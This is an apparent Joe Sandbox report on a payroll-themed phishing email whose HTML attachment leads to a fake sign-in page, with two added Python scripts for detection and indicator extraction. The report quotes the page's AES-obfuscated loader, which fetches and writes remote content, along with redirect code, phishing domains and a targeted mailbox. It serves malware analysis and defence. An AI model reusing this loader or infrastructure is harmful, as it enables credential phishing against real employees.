

Windows Analysis Report
ocedures.msg

Overview

General Information

Sample name:ocedures.msg
renamed because original name is a hash value
Original sample name:Please Read Murexltd Employees New Payroll Amendment Paid Medical Leave And Emergency Loan Procedures.msg
Analysis ID:1499937
MD5:9f3e44d62892eabb1442327ada8f0332
SHA1:e365751b6e99a7c7629b752d5d1755bc805fbca1
SHA256:1637dd7df01a9c28f85ff195cb4744150850b6935b2bfee9e248dae0b5f1accb

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

HTML page contains hidden URLs
HTML page contains suspicious javascript code
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Javascript checks online IP of machine
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6240 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\ocedures.msg" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 1860 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "3429B1E5-3585-42FF-BFDA-C768B92027DE" "27161F02-5B78-4276-881C-C72DECBE88B8" "6240" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 6604 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\8IYQW4LA\Employees_Payment_Amendment.htm MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • chrome.exe (PID: 1652 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1812,i,3389952850226509095,16005016395332430029,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No yara matches
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6240, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
Source: Registry Key set | Author: frack113 | Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\8IYQW4LA\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6240, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder
No Suricata rule has matched


Phishing

Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com | HTTP Parser: https://infinitipulsarjoy.ru///4157.php
Source: https://pulsecortexe.space/ZPtar/ | HTTP Parser: https://infinitipulsarjoy.ru///7436.php
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com | HTTP Parser: window.location.href = atob(
Source: https://pulsecortexe.space/ZPtar/ | HTTP Parser: window.location.href = atob(
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com | HTTP Parser: async function earl(iamb) { <!-- a cars beauty lies in the stories it tells. --> var {a,b,c,d} = json.parse(iamb); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); <!-- <p>discover yourself on the open road.</p> --> } (async () => { document.write(await earl(await (await fetch(await earl(atob(`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...
Source: https://pulsecortexe.space/ZPtar/ | HTTP Parser: async function earl(iamb) { <!-- a cars beauty lies in the stories it tells. --> var {a,b,c,d} = json.parse(iamb); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); <!-- <p>discover yourself on the open road.</p> --> } (async () => { document.write(await earl(await (await fetch(await earl(atob(`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...
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com | HTTP Parser: Number of links: 0
Source: https://pulsecortexe.space/ZPtar/ | HTTP Parser: Number of links: 0
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com | HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com | HTTP Parser: Total embedded image size: 45708
Source: https://pulsecortexe.space/ZPtar/ | HTTP Parser: Total embedded image size: 45708
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com | HTTP Parser: Base64 decoded: {"version":3,"sourceRoot":"/cfsetup_build/src/orchestrator/turnstile/templates","sources":["turnstile.scss"],"names":[],"mappings":"AAmCA;EACI;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI;IAEI;;EAGJ;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI...
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com | HTTP Parser: Title: Sign in to your account does not match URL
Source: https://pulsecortexe.space/ZPtar/ | HTTP Parser: Title: Sign in to your account does not match URL
Source: https://designgallerias.com/Oiaduon30aDN0wXONyIN/#gjohnson@murexltd.com | HTTP Parser: function redirectto(url, delay) { settimeout(function() { window.location.href = url; }, delay); } function getclientip(callback) { fetch('https://api.ipify.org?format=json') .then(response => response.json()) .then(data => { callback(data.ip); }) .catch(error => { console.error('error fetching ip address:', error); callback(null); }); } function getdata(url, params) { return fetch(url + '?' + new urlsearchparams(params), { method: 'get', headers: { 'content-type': 'application/json' } }) .then(response => { if (!response.ok) { throw new error('network response was not ok'); } return response...
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com | HTTP Parser: <input type="password" .../> found
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com | HTTP Parser: No favicon
Source: https://mainet.ne.jp/ | HTTP Parser: No favicon
Source: https://pulsecortexe.space/ | HTTP Parser: No favicon
Source: https://pulsecortexe.space/ZPtar/ | HTTP Parser: No favicon
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com | HTTP Parser: No <meta name="author".. found
Source: https://pulsecortexe.space/ZPtar/ | HTTP Parser: No <meta name="author".. found
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com | HTTP Parser: No <meta name="copyright".. found
Source: https://pulsecortexe.space/ZPtar/ | HTTP Parser: No <meta name="copyright".. found
Source: chrome.exe | Memory has grown: Private usage: 0MB later: 32MB
Source: global traffic | TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: classification engine; Classification label: mal52.phis.winMSG@34/11@48/352
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; File created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; File created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240827T1207160313-6240.etl
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; File read: C:\Users\desktop.ini
Source: unknown; Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\ocedures.msg"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "3429B1E5-3585-42FF-BFDA-C768B92027DE" "27161F02-5B78-4276-881C-C72DECBE88B8" "6240" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" (listed twice in the original report)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\8IYQW4LA\Employees_Payment_Amendment.htm (listed twice in the original report)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1812,i,3389952850226509095,16005016395332430029,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 (listed twice in the original report)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: unknown unknown (27 entries; the sandbox did not resolve the image or command line of these chrome.exe child processes)
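The entry that matters in the process list above is OUTLOOK.EXE launching chrome.exe on Employees_Payment_Amendment.htm out of the INetCache\Content.Outlook attachment cache: that is the moment the HTML attachment becomes a live phishing page in the victim's browser, and it is the one relation in this tree worth a detection. The following Python script is an added example, not part of the Joe Sandbox report, that encodes that detection and runs it over three lines copied from the report's process-creation entries in their flattened "Source: <parent>Process created: <image> <command line>" form. The regular expression for that layout, the browser list, and the shape of the attachment-cache path are assumptions of this example.

```python
"""Detect a browser launched by Outlook on a cached HTML attachment.

Added example; not part of the Joe Sandbox report. SAMPLE_LINES are copied
from the report's process-creation entries (the flattened
"Source: <parent>Process created: <image> <command line>" form). The layout
regex, the browser list and the cache-path pattern are assumptions.
"""
import re

# Constructed sample: three entries copied from the report (the Chrome utility
# command line is shortened; the other two are complete).
SAMPLE_LINES = [
    r'Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE '
    r'"C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\ocedures.msg"',
    r'Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: '
    r'C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" '
    r'--start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\8IYQW4LA\Employees_Payment_Amendment.htm',
    r'Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: '
    r'C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" '
    r'--type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US',
]

# Assumption: parent path runs straight into "Process created:" and the child
# image ends in .exe and is followed by one space, then the command line.
ENTRY_RE = re.compile(
    r'^Source: (?P<parent>.*?)Process created: (?P<image>.*?\.exe) (?P<cmdline>.*)$',
    re.IGNORECASE)
# Outlook's per-profile attachment cache: ...\INetCache\Content.Outlook\<random>\<file>.htm(l)
ATTACHMENT_RE = re.compile(
    r'\\INetCache\\Content\.Outlook\\[^\\"\s]+\\[^\\"\s]+\.html?(?=["\s]|$)',
    re.IGNORECASE)
# Assumption: the browsers worth alerting on in this environment.
BROWSERS = {'chrome.exe', 'msedge.exe', 'firefox.exe', 'iexplore.exe'}


def parse_entry(line):
    """Split one flattened 'Process created' line into (parent, image, cmdline)."""
    m = ENTRY_RE.match(line)
    if not m:
        return None
    return m.group('parent'), m.group('image'), m.group('cmdline')


def basename(path):
    """Last path component, lower-cased ('unknown' stays 'unknown')."""
    return path.rsplit('\\', 1)[-1].lower()


def detect_outlook_html_attachment(lines):
    """Return one alert per browser that Outlook started on a cached HTML attachment."""
    alerts = []
    for line in lines:
        parsed = parse_entry(line)
        if parsed is None:  # 'unknown unknown' children and non-process lines
            continue
        parent, image, cmdline = parsed
        if basename(parent) != 'outlook.exe' or basename(image) not in BROWSERS:
            continue
        hit = ATTACHMENT_RE.search(cmdline)
        if hit:
            alerts.append({
                'parent': parent,
                'browser': basename(image),
                'attachment': hit.group(0).rsplit('\\', 1)[-1],
                'cmdline': cmdline,
            })
    return alerts


if __name__ == '__main__':
    for alert in detect_outlook_html_attachment(SAMPLE_LINES):
        print(f"ALERT: {alert['browser']} launched by Outlook on attachment {alert['attachment']}")
```

On real endpoint telemetry the same three fields are ParentImage, Image and CommandLine in Sysmon event 1 (or the creator process and process command line in Windows 4688); the random eight-character folder under Content.Outlook is why the rule wildcards that component instead of matching 8IYQW4LA. The Chrome-to-Chrome utility launch and the unresolved "unknown unknown" children are ignored by design, since only the Outlook-to-browser hop carries the signal.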
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe; Section loaded: apphelp.dll, c2r64.dll, userenv.dll, msasn1.dll, kernel.appcore.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InProcServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Window found: window name: SysTabControl32
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk, YouTube.lnk, Sheets.lnk, Gmail.lnk, Slides.lnk, Docs.lnk (Chrome's own shortcuts for its bundled web apps, written on first run of the profile; this is what the "Stores files to the Windows start menu directory" signature fired on, not sample-specific behaviour)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process information set: NOOPENFILEERRORBOX (63 occurrences)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (1 occurrence)
(These are the process default hard-error mode flags, i.e. SetErrorMode values, and are routine for Office processes.)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; File Volume queried: C:\Windows\SysWOW64 FullSizeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process information queried: ProcessInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe; Queries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK matrix (techniques the sandbox mapped to this sample; the number in front of each technique is the count of matching signatures; cells of the original 14-column matrix that carried no count were unfilled template placeholders and are omitted)
Resource Development: 1 Scripting
Persistence: 1 Scripting; 1 DLL Side-Loading; 1 Registry Run Keys / Startup Folder
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; 1 Registry Run Keys / Startup Folder; 1 Extra Window Memory Injection
Defense Evasion: 1 Masquerading; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 DLL Side-Loading; 1 Extra Window Memory Injection
Discovery: 1 Process Discovery; 1 File and Directory Discovery; 13 System Information Discovery
Command and Control: 2 Encrypted Channel; 1 Non-Application Layer Protocol; 2 Application Layer Protocol
Reconnaissance, Initial Access, Execution, Credential Access, Lateral Movement, Collection, Exfiltration, Impact: no techniques mapped

[Screenshots: the report's thumbnail gallery is not reproduced in this text version.]
No Antivirus matches (the report states this once for each of its five antivirus categories)
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mainet.ne.jp | 203.142.211.38 | true | false | - | unknown
a.nel.cloudflare.com | 35.190.80.1 | true | false | - | unknown
infinitipulsarjoy.ru | 188.114.97.3 | true | true | - | unknown
plus.l.google.com | 142.250.186.110 | true | false | - | unknown
pulsecortexe.space | 188.114.96.3 | true | false | - | unknown
antibots.net | 188.114.96.3 | true | false | - | unknown
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | - | unknown
play.google.com | 74.125.136.113 | true | false | - | unknown
code.jquery.com | 151.101.66.137 | true | false | - | unknown
cdnjs.cloudflare.com | 104.17.25.14 | true | false | - | unknown
challenges.cloudflare.com | 104.18.95.41 | true | false | - | unknown
api.ipify.org | 104.26.12.205 | true | false | - | unknown
www.google.com | 142.250.9.99 | true | false | - | unknown
designgallerias.com | 160.153.0.153 | true | false | - | unknown
apis.google.com | unknown | unknown | false | - | unknown
URLs
Name | Malicious | Antivirus Detection | Reputation
https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com | true | - | unknown
https://pulsecortexe.space/ | false | - | unknown
https://pulsecortexe.space/ZPtar/ | true | - | unknown
https://mainet.ne.jp/ | false | - | unknown
https://designgallerias.com/Oiaduon30aDN0wXONyIN/#gjohnson@murexltd.com | false | - | unknown
IPs (the Flag column of the original table was an icon and is omitted)
IP | Domain | Country | ASN | ASN Name | Malicious
160.153.0.153 | designgallerias.com | United States | 21501 | GODADDY-AMSDE | false
142.250.186.46 | unknown | United States | 15169 | GOOGLEUS | false
20.189.173.9 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
104.18.94.41 | unknown | United States | 13335 | CLOUDFLARENETUS | false
151.101.130.137 | unknown | United States | 54113 | FASTLYUS | false
151.101.66.137 | code.jquery.com | United States | 54113 | FASTLYUS | false
142.250.186.110 | plus.l.google.com | United States | 15169 | GOOGLEUS | false
35.190.80.1 | a.nel.cloudflare.com | United States | 15169 | GOOGLEUS | false
104.26.13.205 | unknown | United States | 13335 | CLOUDFLARENETUS | false
142.250.9.99 | www.google.com | United States | 15169 | GOOGLEUS | false
172.217.18.110 | unknown | United States | 15169 | GOOGLEUS | false
52.113.194.132 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
34.104.35.123 | unknown | United States | 15169 | GOOGLEUS | false
1.1.1.1 | unknown | Australia | 13335 | CLOUDFLARENETUS | false
52.109.68.130 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
104.18.95.41 | challenges.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false
203.142.211.38 | mainet.ne.jp | Japan | 24282 | KIRKAGOYAJAPANIncJP | false
142.250.186.106 | unknown | United States | 15169 | GOOGLEUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
188.114.97.3 | infinitipulsarjoy.ru | European Union | 13335 | CLOUDFLARENETUS | true
142.250.185.174 | unknown | United States | 15169 | GOOGLEUS | false
142.250.185.131 | unknown | United States | 15169 | GOOGLEUS | false
188.114.96.3 | pulsecortexe.space | European Union | 13335 | CLOUDFLARENETUS | false
64.233.184.84 | unknown | United States | 15169 | GOOGLEUS | false
108.177.122.94 | unknown | United States | 15169 | GOOGLEUS | false
74.125.136.113 | play.google.com | United States | 15169 | GOOGLEUS | false
52.109.76.240 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
172.217.16.195 | unknown | United States | 15169 | GOOGLEUS | false
104.17.25.14 | cdnjs.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false
Private IPs: 192.168.2.17, 192.168.2.16, 192.168.2.23, 192.168.2.13
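The Domain, URL and IP tables above are the indicators a responder takes out of this report, and two things in them deserve more than a copy-paste: both phishing URLs carry the targeted mailbox in the URL fragment (#Mgjohnson@murexltd.com, #gjohnson@murexltd.com), and the phishing hosts resolve to Cloudflare edges (188.114.96.3 and 188.114.97.3, AS13335 in the IP table, with antibots.net sharing 188.114.96.3), so an IP block would hit a CDN rather than the actor. The following Python script is an added example, not part of the Joe Sandbox report: it parses rows copied from the tables in the flattened form they have in this text dump (one cell per line, the Active and Malicious cells fused into strings like "truefalse", and the verdict fused onto the end of each URL) and builds an IOC set, promoting any host whose URL fragment carries a victim address even when the verdict column says false. That layout and that heuristic are assumptions of the example.

```python
"""Turn the report's flattened Domain and URL tables into an IOC set.

Added example; not part of the Joe Sandbox report. DOMAIN_ROWS and URL_ROWS
are copied from the report's tables as they appear in this text dump. The
four-lines-per-record layout, the fused verdict on URLs, and the
"victim address in the fragment" heuristic are assumptions.
"""
import re
from urllib.parse import urlsplit

# Constructed sample: four rows of the Domain table in the dump's layout
# (name, IP or 'unknown', active+malicious fused, reputation).
DOMAIN_ROWS = """\
infinitipulsarjoy.ru
188.114.97.3
truetrue
unknown
pulsecortexe.space
188.114.96.3
truefalse
unknown
api.ipify.org
104.26.12.205
truefalse
unknown
apis.google.com
unknown
unknownfalse
unknown
"""

# Constructed sample: three rows of the URL table (verdict fused onto the URL).
URL_ROWS = """\
https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.comtrue
https://pulsecortexe.space/false
https://designgallerias.com/Oiaduon30aDN0wXONyIN/#gjohnson@murexltd.comfalse
"""

ACTIVE_MALICIOUS_RE = re.compile(r'^(?P<active>true|false|unknown)(?P<malicious>true|false)$')
URL_ROW_RE = re.compile(r'^(?P<url>https?://\S+?)(?P<malicious>true|false)$')
EMAIL_RE = re.compile(r'[\w.+-]+@[\w-]+(?:\.[\w-]+)+')


def parse_domain_rows(text):
    """Each record is four lines: name, IP (or 'unknown'), active+malicious, reputation."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) % 4:
        raise ValueError('domain table is not a multiple of four lines')
    records = []
    for name, ip, flags, reputation in zip(*[iter(lines)] * 4):
        m = ACTIVE_MALICIOUS_RE.match(flags)
        if not m:
            raise ValueError(f'unexpected flags cell {flags!r} for {name}')
        records.append({'name': name,
                        'ip': None if ip == 'unknown' else ip,
                        'active': m.group('active'),
                        'malicious': m.group('malicious') == 'true',
                        'reputation': reputation})
    return records


def parse_url_rows(text):
    """Split the fused verdict off each URL and pull a victim address out of the fragment."""
    records = []
    for line in text.splitlines():
        m = URL_ROW_RE.match(line.strip())
        if not m:
            continue
        url = m.group('url')
        parts = urlsplit(url)
        email = EMAIL_RE.search(parts.fragment)
        records.append({'url': url,
                        'host': parts.hostname,
                        'malicious': m.group('malicious') == 'true',
                        'target_email': email.group(0) if email else None})
    return records


def build_iocs(domains, urls):
    """Combine both tables; promote hosts whose URL fragment carries a victim address."""
    malicious_hosts = {d['name'] for d in domains if d['malicious']}
    malicious_hosts |= {u['host'] for u in urls if u['malicious']}
    # The fragment never leaves the browser (it is not part of the HTTP request), so
    # a mailbox placed there is read by the page's own script, typically to pre-fill
    # a login form: a credential-harvesting tell regardless of the verdict column.
    suspicious_hosts = {u['host'] for u in urls
                        if u['target_email'] and u['host'] not in malicious_hosts}
    return {
        'domains': sorted(malicious_hosts),
        'suspicious_domains': sorted(suspicious_hosts),
        'ips': sorted(d['ip'] for d in domains if d['malicious'] and d['ip']),
        'targeted_emails': sorted({u['target_email'] for u in urls if u['target_email']}),
    }


def defang(value):
    """Make an indicator safe to paste into a ticket."""
    return value.replace('.', '[.]')


if __name__ == '__main__':
    iocs = build_iocs(parse_domain_rows(DOMAIN_ROWS), parse_url_rows(URL_ROWS))
    for key, values in iocs.items():
        print(f'{key}: {[defang(v) for v in values]}')
```

Because the fragment is never sent, proxy and web-server logs will not show which mailbox a given click targeted; the address has to come from the URL as delivered in the message or from the sandbox's URL table, which is why the script keeps targeted_emails as its own output. Block on the domains and URLs; the single IP the sample marks malicious is a shared Cloudflare edge.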
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1499937
Start date and time: 2024-08-27 18:06:31 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of newly started processes analysed: 21
Number of newly started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
Analysis Mode: stream
Analysis stop reason: Timeout
Sample name: ocedures.msg (renamed because original name is a hash value)
Original Sample Name: Please Read Murexltd Employees New Payroll Amendment Paid Medical Leave And Emergency Loan Procedures.msg
Detection: MAL
Classification: mal52.phis.winMSG@34/11@48/352
Cookbook Comments:
• Found application associated with file extension: .msg
• Exclude process from analysis (whitelisted): dllhost.exe
• Excluded IPs from analysis (whitelisted): 20.114.59.183, 52.109.76.240
• Excluded domains from analysis (whitelisted): neu-azsc-config.officeapps.live.com, ocsp.digicert.com, slscr.update.microsoft.com, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, ocsp.edge.digicert.com, sls.update.microsoft.com, officeclient.microsoft.com, europe.configsvc1.live.com.akadns.net, fe3cr.delivery.mp.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetValueKey calls found.
• VT rate limit hit for: ocedures.msg
Process: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type: data
Category: dropped
Size (bytes): 231348
Entropy (8bit): 4.382974685493097
Encrypted: false
SSDEEP:
MD5: 3B00D413D95AF59BEA4415DDF5AEBF91
SHA1: C24E835D0A0F5E57F9641F867F4C9E5431EF8A05
SHA-256: 152A8BCBD176E10FA8F9D8856A4A4ACD478476A158B42E571270DCF1110BC292
SHA-512: 3F3892D77F319A83CDF9070D4394BEF6B9936A454B361881185DB8A9FFA14D754F5AEC57E29ADA3EEE608E34B68D2A0FE18770C1043BA773C5457AAA27EE8742
Malicious: false
Reputation: unknown
Preview: TH02...... .p.H.........SM01X...,....}:.............IPM.Activity...........h...............h............H..h...........$...h...........H..h\tor ...AppD...h...0..........h..&M...........h........_`.k...hv.&M@...I.+w...h....H...8..k...0....T...............d.........2h...............k........8-Au..!h.............. h.......(.....#h....8.........$h.......8....."h........x.....'h..Y...........1h..&M<.........0h....4.....k../h....h......kH..h....p.........-h .......T.....+h2.&M........................ ..............F7..............FIPM.Activity....Form..wwStandard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000....Microsoft...This form is used to create journal entries......f..kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..

Process: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 176365
Entropy (8bit): 5.287474962795063
Encrypted: false
SSDEEP:
MD5: 6F204CDE947BF93D83F612779FEB6120
SHA1: E7525B9D089AE6D980BB1ECF9611FB3E12BCA0AE
SHA-256: 0FB8575066293EF6F80E4790D89BD6EA2650CA90601E55F7E0B2EC873F6E821C
SHA-512: 39C67E690B001DEFA07414922765BED99BD5CE6CF01483363D05A6393CBBB1728B1A77362C6D29E30460A2F7A4062A98001FD29B5444715CF0C88A39571661F9
Malicious: false
Reputation: unknown
